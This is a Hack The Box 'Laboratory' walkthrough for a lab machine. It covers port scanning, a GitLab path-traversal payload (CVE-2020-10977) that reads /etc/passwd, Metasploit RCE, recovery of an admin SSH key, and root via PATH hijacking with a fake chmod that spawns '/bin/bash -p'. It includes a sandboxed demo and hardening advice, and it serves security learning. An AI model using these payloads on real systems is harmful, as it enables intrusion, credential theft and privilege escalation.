HTB::Laboratory

Lab environment

(screenshot: machine info card)

Walkthrough

0x01 Information gathering

Fast full-range port scan with masscan:

masscan -p1-65535 10.10.10.216 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-04-17 08:10:08 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.10.10.216
Discovered open port 22/tcp on 10.10.10.216
Discovered open port 443/tcp on 10.10.10.216

Ports 22, 80 and 443 are open.
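The nmap command that follows reads its port list from a $ports variable the write-up never shows being built. As an added example (not from the original post), the function below turns masscan's "Discovered open port" lines into that comma-separated list; the sample input is the three lines masscan printed above, embedded here so the script runs offline.

```sh
#!/bin/sh
# Build the $ports list for nmap from masscan output (added example).
# Output is a sorted, de-duplicated, comma-separated list such as 22,80,443.
set -u

ports_from_masscan() {
    # field 4 of a "Discovered open port 80/tcp on ..." line is "80/tcp"
    awk '/^Discovered open port/ { split($4, p, "/"); print p[1] }' |
        sort -n -u | tr '\n' ',' | sed 's/,$//'
}

# Constructed sample: the three lines masscan printed for this box.
SAMPLE='Discovered open port 80/tcp on 10.10.10.216
Discovered open port 22/tcp on 10.10.10.216
Discovered open port 443/tcp on 10.10.10.216'

ports=$(printf '%s\n' "$SAMPLE" | ports_from_masscan)
echo "ports=$ports"

# Live use against the box:
#   ports=$(masscan -p1-65535 10.10.10.216 --rate=1000 2>/dev/null | ports_from_masscan)
#   nmap -sC -sV -p"$ports" --min-rate=100 10.10.10.216
```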

Targeted nmap scan of the open ports ($ports holds the list found above, 22,80,443):

nmap -sC -sV -p$ports --min-rate=100 10.10.10.216
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 16:13 CST
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.57s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.19 seconds

Port 443 serves two virtual hosts, taken from the certificate's CN and SAN: https://laboratory.htb and https://git.laboratory.htb. Both names need to be added to /etc/hosts before browsing, since port 80 only redirects to the hostname.

whatweb:

(screenshot: whatweb output for both hosts)

0x02 Exploitation

CVE-2020-10977 (GitLab arbitrary file read via issue move)

The default site is a static page, so start with GitLab: register an account using an @laboratory.htb email address and log in:

(screenshot: GitLab sign-in)

Read the GitLab version (shown on the /help page once logged in) and search for matching vulnerabilities:

(screenshot: GitLab version and the matching file-read/RCE advisory)

HackerOne has a detailed analysis of this vulnerability:

(screenshot: HackerOne report)

Exploitation steps. The payload is a markdown image link whose "upload" path traverses out of the project's uploads directory to an arbitrary file:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

Create a new project named test, open an issue in it and paste the payload above into the issue description:

(screenshot: issue with the payload in its description)

Create a second project named test1 and move the issue into it. When GitLab moves the issue it copies the referenced "attachment" into the new project, so the traversed file is now served as a normal upload and can be downloaded from the moved issue:

(screenshot: downloadable passwd attachment on the moved issue)

Contents of passwd:

(screenshot: /etc/passwd)

RCE:

(screenshot: RCE)

Exploit with Metasploit:

(screenshot: Metasploit module info and options)

A reverse shell comes back:

(screenshot: reverse shell)

user.txt

The shell runs as the git user, which owns the GitLab installation, so the GitLab admin's password can be reset from there (the GitLab Rails console, gitlab-rails console, is the usual way):

(screenshot: resetting the password of the admin user dexter)

Log in to GitLab as that admin; a user's SSH private key is found in the admin-visible backend:

(screenshot: id_rsa)

Copy it to the attacking machine (chmod 600 on the key file, or ssh will refuse it) and log in over SSH:

(screenshot: SSH login and user.txt)

root.txt

A todo file is found, hinting that docker is the privilege-escalation path:

(screenshot: todo file)

Run a privilege-escalation enumeration script:

(screenshot: enumeration output)

docker-security is a SUID executable. Trace the library calls it makes with ltrace:

(screenshot: ltrace output)

It calls chmod twice.

It calls chmod without specifying the full path /usr/bin/chmod, so it is exploitable by PATH hijacking.

If you are not familiar with PATH hijacking, read this article:

Linux Privilege Escalation Using PATH Variable

Because the binary invokes chmod by bare name rather than /usr/bin/chmod, the name is resolved through $PATH at run time. Prepend a directory we control (holding our own chmod) to PATH, and the SUID binary executes our file as root:

(screenshot: privilege escalation to root)
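As an added example (not from the original write-up), the script below reproduces the hijack in a sandbox so the mechanism can be seen without the box: a shell function stands in for docker-security and makes two bare chmod calls (as ltrace showed), a fake chmod is planted in a temporary directory that is prepended to PATH, and the same run is repeated against a hardened stand-in that calls chmod by absolute path. The fake chmod here only appends a line to a marker file; on the target it would contain /bin/bash -p, and the on-box commands in the header comment are my reconstruction of the step, including the binary name docker-security.

```sh
#!/bin/sh
# PATH-hijacking demo (added example). On the target the equivalent steps are:
#   printf '#!/bin/bash\n/bin/bash -p\n' > /tmp/chmod   # fake chmod: root shell
#   chmod +x /tmp/chmod
#   PATH=/tmp:$PATH docker-security                     # SUID binary runs our chmod
# Here the SUID binary is replaced by shell functions so the demo runs anywhere.
set -u

# Absolute path of the real chmod, captured before PATH is tampered with.
REAL_CHMOD=$(command -v chmod)

# Stand-in for docker-security: two chmod calls by bare name, resolved via $PATH.
vulnerable_program() {
    chmod 700 "$1"
    chmod 700 "$2"
}

# Hardened stand-in: absolute path, so $PATH cannot redirect the lookup.
hardened_program() {
    "$REAL_CHMOD" 700 "$1"
    "$REAL_CHMOD" 700 "$2"
}

# Plant a fake chmod in directory $1 that appends a line to marker file $2 each
# time it runs (stands in for the root shell a real hijack would spawn).
plant_fake_chmod() {
    printf '#!/bin/sh\necho "fake chmod ran as uid $(id -u) with args: $*" >> "%s"\n' "$2" > "$1/chmod"
    "$REAL_CHMOD" +x "$1/chmod"
}

# Run the function named in $1 with a hostile PATH and print how many times the
# fake chmod fired: 2 means both calls were hijacked, 0 means immune.
count_hijacks() {
    dir=$(mktemp -d)
    marker="$dir/marker"
    : > "$marker"
    plant_fake_chmod "$dir" "$marker"
    touch "$dir/a" "$dir/b"
    # Subshell so the modified PATH does not leak; hash -r drops cached lookups.
    ( PATH="$dir:$PATH"; hash -r; "$1" "$dir/a" "$dir/b" ) >/dev/null 2>&1
    n=0
    while IFS= read -r line; do n=$((n + 1)); done < "$marker"
    rm -rf "$dir"
    echo "$n"
}

echo "vulnerable program: fake chmod fired $(count_hijacks vulnerable_program) times"
echo "hardened program:   fake chmod fired $(count_hijacks hardened_program) times"
```

The fix on the binary side is the hardened form: call /usr/bin/chmod (or better, chmod(2) directly instead of system()) and reset PATH and the rest of the environment before any exec in a SUID program.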

root.txt obtained.

Reference

CVE-2020-10977

PATH hijacking

Original article: https://www.cnblogs.com/chalan630/p/14705167.html